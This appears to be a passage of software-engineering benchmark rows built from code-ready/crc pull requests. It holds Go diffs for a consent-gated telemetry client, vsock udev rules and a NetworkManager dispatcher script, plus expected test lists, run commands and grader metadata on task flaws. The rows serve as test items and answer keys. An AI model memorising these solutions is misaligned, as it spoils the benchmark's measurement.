require.NoError(t, err) defer os.RemoveAll(dir) @@ -97,22 +78,22 @@ func TestClientUploadWithConsent(t *testing.T) { config, err := newTestConfig(true) require.NoError(t, err) - c := &Client{segmentClient: client, config: config, telemetryFilePath: filepath.Join(dir, "telemetry")} + c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) + require.NoError(t, err) - require.NoError(t, c.Upload(errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Close()) - s := segmentResponse{} select { - case x, ok := <-body: - if ok { - err = json.Unmarshal(x, &s) - require.NoError(t, err) - } + case x := <-body: + s := segmentResponse{} + require.NoError(t, json.Unmarshal(x, &s)) + require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") + require.Equal(t, s.Context.App.Name, "crc") + require.Equal(t, s.Context.App.Version, version.GetCRCVersion()) default: + require.Fail(t, "server should receive data") } - require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") - require.Equal(t, s.Context.App.Name, "crc") - require.Equal(t, s.Context.App.Version, "1.20.0") } func TestClientUploadWithOutConsent(t *testing.T) { @@ -120,17 +101,6 @@ func TestClientUploadWithOutConsent(t *testing.T) { defer server.Close() defer close(body) - client, err := analytics.NewWithConfig("dummykey", analytics.Config{ - DefaultContext: &analytics.Context{ - App: analytics.AppInfo{ - Name: "crc", - Version: "1.20.0", - }, - }, - Endpoint: server.URL, - }) - require.NoError(t, err) - dir, err := ioutil.TempDir("", "cfg") require.NoError(t, err) defer os.RemoveAll(dir) @@ -138,19 +108,15 @@ func TestClientUploadWithOutConsent(t *testing.T) { config, err := newTestConfig(false) require.NoError(t, err) - c := &Client{segmentClient: client, config: config, telemetryFilePath: filepath.Join(dir, "telemetry")} + c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) + require.NoError(t, err) - require.NoError(t, c.Upload(errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Close()) - s := segmentResponse{} select { - case x, ok := <-body: - if ok { - err = json.Unmarshal(x, &s) - require.NoError(t, err) - } + case <-body: + require.Fail(t, "server should not receive data") default: } - - require.Len(t, s.Batch, 0) }
[ "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestWarnPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Method: Client.Upload(self, action string, err error) Location: pkg/crc/segment/segment.go Inputs: action – a string describing the command that triggered the error (e.g., "start"); err – the error to be reported (non‑nil). The client must have telemetry consent enabled; otherwise the call is a no‑op. Outputs: error – returns any error from generating the anonymous ID or from enqueuing the analytics event; nil on success. Method: Client.Close(self) Location: pkg/crc/segment/segment.go Inputs: none. Closes the underlying Segment analytics client, releasing resources. Outputs: error – the result of the underlying client’s Close method (if any). Function: newCustomClient(config *crcConfig.Config, telemetryFilePath string, segmentEndpoint string) Location: pkg/crc/segment/segment.go Inputs: config – CRC configuration object (used to read telemetry consent); telemetryFilePath – path where the anonymous ID is stored/retrieved; segmentEndpoint – custom Segment endpoint (used in tests to point to a mock server). Outputs: (*Client, error) – returns a fully‑initialized Client ready for Upload/Close, or an error if the Segment client cannot be created. Description: Constructs a Segment client with the provided endpoint and config, wiring up logging and telemetry handling. It is used by tests to inject a mock server URL.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 18, "num_modified_lines": 128, "pr_author": "guillaumerose", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "B2", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "integration_feat" ], "reason": null, "reasoning": "The issue asks to intercept errors, remove os.Exit calls, use RunE, and add segment middleware, but the provided tests expect new functions (newCustomClient, Upload taking an action string) and configuration registration that are not mentioned in the description. This mismatch indicates implicit naming expectations in the tests. Therefore the task is not cleanly solvable as‑is and falls under B2 (implicit naming).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests require a newCustomClient constructor and an Upload method that accepts an action string, which are not specified in the issue.", "Tests import cmdConfig.RegisterSettings and expect config to have a ConsentTelemetry setting registered, which the issue does not mention." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
667a4164481ca9271b424d51775f75baed69243e
2020-12-24 09:49:29
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1801#" title="Author self-approved">anjannath</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [anjannath] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1801#" title="Author self-approved">anjannath</a>*, *<a href="https://github.com/code-ready/crc/pull/1801#pullrequestreview-562427683" title="Approved">cfergeau</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [anjannath,cfergeau] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} -->
code-ready__crc-1801
diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index 36e7a13b2..1c2b96adf 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -5,6 +5,7 @@ import ( "io/ioutil" "os" "strings" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -175,13 +176,12 @@ func addForceFlag(cmd *cobra.Command) { func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { return func(cmd *cobra.Command, args []string) error { logging.Debugf("Running '%s'", fullCmd) - if err := input(cmd, args); err != nil { - if serr := segmentClient.Upload(fullCmd, err); serr != nil { - logging.Debugf("Cannot send data to telemetry: %v", serr) - } - return err + startTime := time.Now() + err := input(cmd, args) + if serr := segmentClient.Upload(fullCmd, time.Since(startTime), err); serr != nil { + logging.Debugf("Cannot send data to telemetry: %v", serr) } - return nil + return err } } diff --git a/pkg/crc/preflight/preflight_checks_network_linux.go b/pkg/crc/preflight/preflight_checks_network_linux.go index bc78d6802..ca22b3ea9 100644 --- a/pkg/crc/preflight/preflight_checks_network_linux.go +++ b/pkg/crc/preflight/preflight_checks_network_linux.go @@ -72,22 +72,27 @@ server=/crc.testing/192.168.130.11 dns=dnsmasq ` - crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") - crcNetworkManagerDispatcherConfig = `#!/bin/sh + crcNetworkManagerOldDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") + crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "99-crc.sh") + crcNetworkManagerDispatcherConfig = `#!/bin/sh # This is a NetworkManager dispatcher script to configure split DNS for # the 'crc' libvirt network. -# The corresponding crc bridge is recreated each time the system reboots, so -# it cannot be configured permanently through NetworkManager. -# Changing DNS settings with nmcli requires the connection to go down/up, -# so we directly make the change using resolvectl +# +# The corresponding crc bridge is not created through NetworkManager, so +# it cannot be configured permanently through NetworkManager. We make the +# change directly using resolvectl instead. +# +# NetworkManager will overwrite this resolvectl configuration every time a +# network connection goes up/down, so we run this script on each of these events +# to restore our settings. This is a NetworkManager bug which is fixed in +# version 1.26.6 by this commit: +# https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe export LC_ALL=C -if [ "$1" = crc ]; then - resolvectl domain "$1" ~testing - resolvectl dns "$1" 192.168.130.11 - resolvectl default-route "$1" false -fi +resolvectl domain crc ~testing +resolvectl dns crc 192.168.130.11 +resolvectl default-route crc false exit 0 ` @@ -266,6 +271,10 @@ func checkCrcNetworkManagerDispatcherFile() error { func fixCrcNetworkManagerDispatcherFile() error { logging.Debug("Fixing NetworkManager dispatcher configuration") + + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + err := fixNetworkManagerConfigFile(crcNetworkManagerDispatcherPath, crcNetworkManagerDispatcherConfig, 0755) if err != nil { return err @@ -276,6 +285,9 @@ func fixCrcNetworkManagerDispatcherFile() error { } func removeCrcNetworkManagerDispatcherFile() error { + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + return removeNetworkManagerConfigFile(crcNetworkManagerDispatcherPath) } diff --git a/pkg/crc/preflight/preflight_linux.go b/pkg/crc/preflight/preflight_linux.go index f2e7ff45f..e2587c8c1 100644 --- a/pkg/crc/preflight/preflight_linux.go +++ b/pkg/crc/preflight/preflight_linux.go @@ -8,6 +8,7 @@ import ( "strings" "syscall" + crcErrors "github.com/code-ready/crc/pkg/crc/errors" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/network" crcos "github.com/code-ready/crc/pkg/os" @@ -97,13 +98,20 @@ var libvirtNetworkPreflightChecks = [...]Check{ } var vsockPreflightChecks = Check{ - configKeySuffix: "check-vsock", - checkDescription: "Checking if vsock is correctly configured", - check: checkVsock, - fixDescription: "Checking if vsock is correctly configured", - fix: fixVsock, + configKeySuffix: "check-vsock", + checkDescription: "Checking if vsock is correctly configured", + check: checkVsock, + fixDescription: "Checking if vsock is correctly configured", + fix: fixVsock, + cleanupDescription: "Removing vsock configuration", + cleanup: removeVsockCrcSettings, } +const ( + vsockUdevRulesPath = "/usr/lib/udev/rules.d/99-crc-vsock.rules" + vsockModuleAutoLoadConfPath = "/etc/modules-load.d/vhost_vsock.conf" +) + func checkVsock() error { executable, err := os.Executable() if err != nil { @@ -126,7 +134,7 @@ func checkVsock() error { return err } if group.Name != "libvirt" { - return errors.New("/dev/vsock is not is the right group") + return errors.New("/dev/vsock is not in the right group") } } else { return errors.New("cannot cast info") @@ -146,21 +154,39 @@ func fixVsock() error { if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("modprobe vhost_vsock", "modprobe", "vhost_vsock") + + udevRule := `KERNEL=="vsock", MODE="0660", OWNER="root", GROUP="libvirt"` + err = crcos.WriteToFileAsRoot("Create udev rule for /dev/vsock", udevRule, vsockUdevRulesPath, 0644) if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("chown /dev/vsock", "chown", "root:libvirt", "/dev/vsock") + err = crcos.WriteToFileAsRoot(fmt.Sprintf("Create file %s", vsockModuleAutoLoadConfPath), "vhost_vsock", vsockModuleAutoLoadConfPath, 0644) if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("chmod /dev/vsock", "chmod", "g+rw", "/dev/vsock") + _, _, err = crcos.RunWithPrivilege("modprobe vhost_vsock", "modprobe", "vhost_vsock") if err != nil { return err } return nil } +func removeVsockCrcSettings() error { + var mErr crcErrors.MultiError + _, _, err := crcos.RunWithPrivilege(fmt.Sprintf("rm %s", vsockUdevRulesPath), "rm", "-f", vsockUdevRulesPath) + if err != nil { + mErr.Collect(err) + } + _, _, err = crcos.RunWithPrivilege(fmt.Sprintf("rm %s", vsockModuleAutoLoadConfPath), "rm", "-f", vsockModuleAutoLoadConfPath) + if err != nil { + mErr.Collect(err) + } + if len(mErr.Errors) == 0 { + return nil + } + return mErr +} + func getAllPreflightChecks() []Check { checks := getPreflightChecksForDistro(distro(), network.DefaultMode) checks = append(checks, vsockPreflightChecks) diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index 254dfb386..e9ac423c4 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -4,7 +4,9 @@ import ( "io/ioutil" "os" "path/filepath" + "runtime" "strings" + "time" "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -53,24 +55,35 @@ func (c *Client) Close() error { return c.segmentClient.Close() } -func (c *Client) Upload(action string, err error) error { +func (c *Client) Upload(action string, duration time.Duration, err error) error { if !c.config.Get(config.ConsentTelemetry).AsBool() { return nil } - logging.Debug("Uploading the error to segment") anonymousID, uerr := getUserIdentity(c.telemetryFilePath) if uerr != nil { return uerr } - t := analytics.NewTraits(). - Set("action", action). - Set("error", err.Error()) + if err := c.segmentClient.Enqueue(analytics.Identify{ + AnonymousId: anonymousID, + Traits: analytics.NewTraits(). + Set("os", runtime.GOOS), + }); err != nil { + return err + } + + properties := analytics.NewProperties(). + Set("success", err == nil). + Set("duration", duration.Milliseconds()) + if err != nil { + properties = properties.Set("error", err.Error()) + } - return c.segmentClient.Enqueue(analytics.Identify{ + return c.segmentClient.Enqueue(analytics.Track{ AnonymousId: anonymousID, - Traits: t, + Event: action, + Properties: properties, }) }
Use udev rule to configure the permission and group for /dev/vsock This would persist the permissions and group change after reboot
**Title** Persist vsock permissions and improve telemetry reporting **Problem** * vsock device permissions and group ownership are not retained after a reboot. * Telemetry uploads lack execution duration, success status, and OS information, and misuse the Identify call. **Root Cause** * The vsock pre‑flight fix only altered the device on‑the‑fly (chown/chmod) without creating persistent udev rules or ensuring the kernel module loads automatically. * Telemetry code sent only an Identify event with an error string, omitting useful metrics and mixing event types. **Fix / Expected Behavior** - Measure command execution time and pass the duration, success flag, and any error to telemetry. - Send OS information in an Identify event and command details in a Track event. - Create a persistent udev rule and a modules‑load configuration for the vsock device, and load the module at fix time. - Provide a cleanup routine that removes the added udev rule and modules‑load file when the vsock check is undone. - Relocate the NetworkManager dispatcher script to its correct directory and delete the legacy script to avoid stale configuration. **Risk & Validation** - Verify that telemetry respects user consent and that no panic occurs when uploading metrics. - Confirm that after applying the fix, `/dev/vsock` retains the correct group and mode across reboots and that the cleanup removes the created files. - Run the pre‑flight and networking test suites to ensure the updated dispatcher path does not break DNS split‑tunneling.
1,801
code-ready/crc
diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index cdf4faa22..abc799f97 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -8,7 +8,9 @@ import ( "net/http/httptest" "os" "path/filepath" + "runtime" "testing" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -22,8 +24,11 @@ type segmentResponse struct { AnonymousID string `json:"anonymousId"` MessageID string `json:"messageId"` Traits struct { - Error string `json:"error"` + OS string `json:"os"` } `json:"traits"` + Properties struct { + Error string `json:"error"` + } `json:"properties"` Type string `json:"type"` } `json:"batch"` Context struct { @@ -81,14 +86,17 @@ func TestClientUploadWithConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Minute, errors.New("an error occurred"))) require.NoError(t, c.Close()) select { case x := <-body: s := segmentResponse{} require.NoError(t, json.Unmarshal(x, &s)) - require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") + require.Equal(t, s.Batch[0].Type, "identify") + require.Equal(t, s.Batch[0].Traits.OS, runtime.GOOS) + require.Equal(t, s.Batch[1].Type, "track") + require.Equal(t, s.Batch[1].Properties.Error, "an error occurred") require.Equal(t, s.Context.App.Name, "crc") require.Equal(t, s.Context.App.Version, version.GetCRCVersion()) default: @@ -111,7 +119,7 @@ func TestClientUploadWithOutConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Second, errors.New("an error occurred"))) require.NoError(t, c.Close()) select {
[ "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Method: (*Client).Upload(action string, duration time.Duration, err error) error Location: pkg/crc/segment/segment.go Inputs: - **action** (string): name of the telemetry event (e.g., “start”). - **duration** (time.Duration): elapsed time of the operation, recorded in milliseconds. - **err** (error): the error returned by the operation; may be nil to indicate success. Outputs: - **error**: any error produced while sending telemetry (including configuration/consent errors). Returns nil when telemetry is successfully queued or when telemetry consent is disabled. Description: Sends telemetry to Segment when consent is enabled. First queues an **Identify** call containing the OS trait, then queues a **Track** call with the given action, a “success” flag, the duration in ms, and the error message (if any). The method now requires the caller to supply the operation duration.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 4, "num_modified_lines": 84, "pr_author": "anjannath", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue asks for a persistent udev rule to set /dev/vsock permissions and group. The provided tests, however, focus on changes to the telemetry client (new Upload signature, OS trait, duration property) which are unrelated to the udev rule. Thus the test suite couples this task to an unrelated feature, causing a mismatch between the issue intent and test expectations. This signals a test‑suite coupling problem (B1).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests modify segment client behavior (Upload now requires duration, adds OS trait and track events) which is not mentioned in the issue.", "Test expectations for telemetry data are unrelated to the vsock udev rule described." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ea33a56c2cac947eca13ae7fd4696da1fb511653
2020-12-24 09:54:18
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1802#" title="Author self-approved">guillaumerose</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [guillaumerose] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> guillaumerose: Ready for an other round of review :) openshift-ci-robot: @guillaumerose: PR needs rebase. <details> Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository. </details> guillaumerose: I also hesitated for hyperv driver but at the end, it is much easier to have machine reduced to the strict minimum. The major benefits is the ability to share code between preflights and the driver (how we invoke powershell, etc). praveenkumar: /needs-rebase guillaumerose: rebased!
code-ready__crc-1802
diff --git a/Makefile b/Makefile index e17520a54..16a5b83c9 100644 --- a/Makefile +++ b/Makefile @@ -102,7 +102,7 @@ cross: $(BUILD_DIR)/macos-amd64/crc $(BUILD_DIR)/linux-amd64/crc $(BUILD_DIR)/wi .PHONY: test test: - go test --tags build -v -ldflags="$(VERSION_VARIABLES)" ./pkg/... ./cmd/... + go test -race --tags build -v -ldflags="$(VERSION_VARIABLES)" ./pkg/... ./cmd/... .PHONY: build_docs build_docs: diff --git a/appveyor.yml b/appveyor.yml index ccf77c985..2d04c171f 100644 --- a/appveyor.yml +++ b/appveyor.yml @@ -4,6 +4,7 @@ environment: GOPATH: c:\gopath stack: go 1.14 before_test: + - choco install mingw - choco install make - make cross test_script: diff --git a/pkg/crc/machine/driver.go b/pkg/crc/machine/driver.go index 12aa40b06..249265bf3 100644 --- a/pkg/crc/machine/driver.go +++ b/pkg/crc/machine/driver.go @@ -2,8 +2,8 @@ package machine import ( "github.com/code-ready/crc/pkg/crc/machine/config" + "github.com/code-ready/crc/pkg/libmachine/host" libmachine "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/host" ) type valueSetter func(driver *libmachine.VMDriver) bool diff --git a/pkg/crc/machine/driver_darwin.go b/pkg/crc/machine/driver_darwin.go index 92ad9b960..2c1387a6d 100644 --- a/pkg/crc/machine/driver_darwin.go +++ b/pkg/crc/machine/driver_darwin.go @@ -7,9 +7,9 @@ import ( "github.com/code-ready/crc/pkg/crc/constants" "github.com/code-ready/crc/pkg/crc/machine/config" "github.com/code-ready/crc/pkg/crc/machine/hyperkit" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" machineHyperkit "github.com/code-ready/machine/drivers/hyperkit" - "github.com/code-ready/machine/libmachine" - "github.com/code-ready/machine/libmachine/host" ) func newHost(api libmachine.API, machineConfig config.MachineConfig) (*host.Host, error) { diff --git a/pkg/crc/machine/driver_linux.go b/pkg/crc/machine/driver_linux.go index 65336ee90..6613d44c8 100644 --- a/pkg/crc/machine/driver_linux.go +++ b/pkg/crc/machine/driver_linux.go @@ -7,9 +7,9 @@ import ( "github.com/code-ready/crc/pkg/crc/constants" "github.com/code-ready/crc/pkg/crc/machine/config" "github.com/code-ready/crc/pkg/crc/machine/libvirt" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" machineLibvirt "github.com/code-ready/machine/drivers/libvirt" - "github.com/code-ready/machine/libmachine" - "github.com/code-ready/machine/libmachine/host" ) func newHost(api libmachine.API, machineConfig config.MachineConfig) (*host.Host, error) { diff --git a/pkg/crc/machine/driver_windows.go b/pkg/crc/machine/driver_windows.go index ffcc4ad49..1f9993788 100644 --- a/pkg/crc/machine/driver_windows.go +++ b/pkg/crc/machine/driver_windows.go @@ -6,9 +6,9 @@ import ( "github.com/code-ready/crc/pkg/crc/machine/config" "github.com/code-ready/crc/pkg/crc/machine/hyperv" - machineHyperv "github.com/code-ready/machine/drivers/hyperv" - "github.com/code-ready/machine/libmachine" - "github.com/code-ready/machine/libmachine/host" + machineHyperv "github.com/code-ready/crc/pkg/drivers/hyperv" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" ) func newHost(api libmachine.API, machineConfig config.MachineConfig) (*host.Host, error) { diff --git a/pkg/crc/machine/hyperv/driver_windows.go b/pkg/crc/machine/hyperv/driver_windows.go index f63ef4f57..be4dae9ed 100644 --- a/pkg/crc/machine/hyperv/driver_windows.go +++ b/pkg/crc/machine/hyperv/driver_windows.go @@ -2,11 +2,9 @@ package hyperv import ( "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/network" - "github.com/code-ready/machine/drivers/hyperv" - "github.com/code-ready/crc/pkg/crc/machine/config" - + "github.com/code-ready/crc/pkg/crc/network" + "github.com/code-ready/crc/pkg/drivers/hyperv" winnet "github.com/code-ready/crc/pkg/os/windows/network" ) @@ -18,6 +16,7 @@ func CreateHost(machineConfig config.MachineConfig) *hyperv.Driver { hypervDriver.DisableDynamicMemory = true if machineConfig.NetworkMode == network.VSockMode { + hypervDriver.VirtualSwitch = "" } else { // Determine the Virtual Switch to be used diff --git a/pkg/crc/machine/machine.go b/pkg/crc/machine/machine.go index 4f14c9d94..cdb1599c2 100644 --- a/pkg/crc/machine/machine.go +++ b/pkg/crc/machine/machine.go @@ -9,9 +9,9 @@ import ( "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/machine/bundle" "github.com/code-ready/crc/pkg/crc/network" - "github.com/code-ready/machine/libmachine" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/host" "github.com/code-ready/machine/libmachine/log" ) diff --git a/pkg/crc/machine/start.go b/pkg/crc/machine/start.go index b844edbab..f5ac9fe91 100644 --- a/pkg/crc/machine/start.go +++ b/pkg/crc/machine/start.go @@ -23,10 +23,10 @@ import ( "github.com/code-ready/crc/pkg/crc/ssh" crcssh "github.com/code-ready/crc/pkg/crc/ssh" "github.com/code-ready/crc/pkg/crc/systemd" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" crcos "github.com/code-ready/crc/pkg/os" - 